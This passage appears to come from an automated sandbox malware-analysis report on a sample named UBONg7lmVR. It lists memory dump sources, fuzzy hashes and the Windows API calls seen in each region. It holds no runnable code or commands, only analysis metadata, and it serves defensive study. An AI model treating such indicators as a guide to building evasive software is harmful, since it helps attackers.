                                                  • Opcode Fuzzy Hash: 29e4c7b690d1bd72483ffbd4e6f16cea71819ca8ce294bd4ac5dbb62bb704d72
                                                  • Instruction Fuzzy Hash: 49C18DB0E002658FCB15CF65D880B9DFBB2EF99304F14C1AAD84AAB255DB30D956DF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e2dc7c8c94b704dbc2ff4ea5c5228934175cbf71a78f41d1a87b6ddd0d843b1
                                                  • Instruction ID: fcf065379169dde52d62aa5bc72720f1bed06b49de38a96a0291f430f8f986ad
                                                  • Opcode Fuzzy Hash: 9e2dc7c8c94b704dbc2ff4ea5c5228934175cbf71a78f41d1a87b6ddd0d843b1
                                                  • Instruction Fuzzy Hash: BFD11435D1175ACACB01EB68D9907A9B7B1EFD5300F10CB9AD1097B260EB706AC8CF81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0865f40966205596a3812cacd968da71809934f94c8d395d7df9decc5f4082d7
                                                  • Instruction ID: dd85f6d1ce1c56a91dd998598fc082183bd4af1903b41b63d726ee6bd188ffc9
                                                  • Opcode Fuzzy Hash: 0865f40966205596a3812cacd968da71809934f94c8d395d7df9decc5f4082d7
                                                  • Instruction Fuzzy Hash: E1D1F435D1175ACACB01EB64D9907A9B7B1EF95300F10C79AD1097B260EB70AAC9CF91

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 03F8E2FE
                                                  • GetCurrentThread.KERNEL32 ref: 03F8E33B
                                                  • GetCurrentProcess.KERNEL32 ref: 03F8E378
                                                  • GetCurrentThreadId.KERNEL32 ref: 03F8E3D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 1f60ec02ff3a8692f553a7d7585979abbbdca33f14f76a29a04ad67d1c24a85e
                                                  • Instruction ID: a9d0004ed7da8c4e3b8ca0fef7ea2ccba8285b0010e1813225c3be55371b7493
                                                  • Opcode Fuzzy Hash: 1f60ec02ff3a8692f553a7d7585979abbbdca33f14f76a29a04ad67d1c24a85e
                                                  • Instruction Fuzzy Hash: D25178B09003098FDB14DFA9C948BAEBFF1EF48314F248469E009A7360DB34A945CF65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa8cf6735f221a1027638170cf29541e3e3dd79a10a094a3f1f59a387db9c273
                                                  • Instruction ID: b52d48b648c00419875cb81570d98ab7dee3312b2ad30f383a260f45a324d1af
                                                  • Opcode Fuzzy Hash: fa8cf6735f221a1027638170cf29541e3e3dd79a10a094a3f1f59a387db9c273
                                                  • Instruction Fuzzy Hash: 17226D34E00105CFDB14DF98C684AFEB7B6EB85350F258056E915AF366C73DA881DB92

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,06CC4108,05D4E5AC,?,00000000), ref: 099B04A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID: Hp
                                                  • API String ID: 2492992576-671740992
                                                  • Opcode ID: 5bc854f4ddc333ca21b7c4282c1ed7217cbe0b461dd966ac6b08dfc5ba26cb32
                                                  • Instruction ID: a0a3881038ce50dc12e78ad09e5307ac39295f4e560459a695efaca654089545
                                                  • Opcode Fuzzy Hash: 5bc854f4ddc333ca21b7c4282c1ed7217cbe0b461dd966ac6b08dfc5ba26cb32
                                                  • Instruction Fuzzy Hash: BE518B353006118FDB18EF29C858B2E77EBAFC9A04B154469E046CF7A5CF68EC06C7A1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp$Hp
                                                  • API String ID: 0-2951427863
                                                  • Opcode ID: 462e45dddbd6cafdcf8cd78e689616eb962c3288f0e4760256ea34caf6b3d7d0
                                                  • Instruction ID: e9ee14630800dfb983a762b43a791115eacb27ec77113c52d74ccffa7bf176b2
                                                  • Opcode Fuzzy Hash: 462e45dddbd6cafdcf8cd78e689616eb962c3288f0e4760256ea34caf6b3d7d0
                                                  • Instruction Fuzzy Hash: E2818D74E003198FDB14DFA9C8946AEBBF2FF88300F24852AE505EB350DB749905CBA1

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 154118D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 40a7e73a36cac23bc28b83c0b474eeaf52b15c088e1be37a26750fd5914c60a1
                                                  • Instruction ID: 12114e83b8c25b95eb764e2050c8ae6a50eacfd93720ca593029eb3f0a5c03aa
                                                  • Opcode Fuzzy Hash: 40a7e73a36cac23bc28b83c0b474eeaf52b15c088e1be37a26750fd5914c60a1
                                                  • Instruction Fuzzy Hash: 6C816970E043598FCB14DFA9C844BAEBFF6BF89310F14946AD816AB350DB74A945CB60
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 33ed54166f7e459473fcefbc6b2209e0b5eb637b41358f14deb851b1ac1d21ff
                                                  • Instruction ID: 0207cfbbb3a9247dd50e0d69515ffce415dd926f19e6337c85a12106eeba4619
                                                  • Opcode Fuzzy Hash: 33ed54166f7e459473fcefbc6b2209e0b5eb637b41358f14deb851b1ac1d21ff
                                                  • Instruction Fuzzy Hash: 4D91167590021ACFCF11DF98D8809DDFBB1FF98314F258656E918AB221D730AA96CB90
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 03F8C25E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 118e957d998ca96e1571580f646d35744cde8721cc46b37e173a3aa93f40bf2e
                                                  • Instruction ID: 89520ccbbffe6d13e16dfb5af22b7d83d58badff22a59215af1637e0442a2c95
                                                  • Opcode Fuzzy Hash: 118e957d998ca96e1571580f646d35744cde8721cc46b37e173a3aa93f40bf2e
                                                  • Instruction Fuzzy Hash: 6E812470A00B068FD728DF69D45075ABBF6FF88304F14892DD586DBA50DB35E945CBA0
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 154118D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 099B2CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 099B2CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Focus
                                                  • String ID:
                                                  • API String ID: 2734777837-0
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 099B5231
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 03F87159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 03F87159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Focus
                                                  • String ID:
                                                  • API String ID: 2734777837-0
                                                  APIs
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 07D29777
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: FromMonitorPoint
                                                  • String ID:
                                                  • API String ID: 1566494148-0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03F8E54F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 07D2C43A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03F8C2D9,00000800,00000000,00000000), ref: 03F8C4CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 1541266D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,154185AA,00000000,00000000,06CC4108,05D4E5AC), ref: 154189F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,154185AA,00000000,00000000,06CC4108,05D4E5AC), ref: 154189F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03F8C2D9,00000800,00000000,00000000), ref: 03F8C4CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,15418637,00000000,06CC4108,05D4E5AC,00000000,?), ref: 15418CC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 07D2C43A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,15418637,00000000,06CC4108,05D4E5AC,00000000,?), ref: 15418CC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,-00000018,?,15418615,00000000,?), ref: 15418C10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 099B2E55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 07D2CC75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 07D2FABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,-00000018,?,15418615,00000000,?), ref: 15418C10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 07D2FABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 03F8C25E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 1541266D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  APIs
                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,154186EF), ref: 15419185
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  APIs
                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,154186EF), ref: 15419185
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (p
                                                  • API String ID: 0-4175582459
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 099B2E55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 07D2CC75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Tep
                                                  • API String ID: 0-914316021
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp
                                                  • API String ID: 0-671740992
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp
                                                  • API String ID: 0-671740992
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Tep
                                                  • API String ID: 0-914316021
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
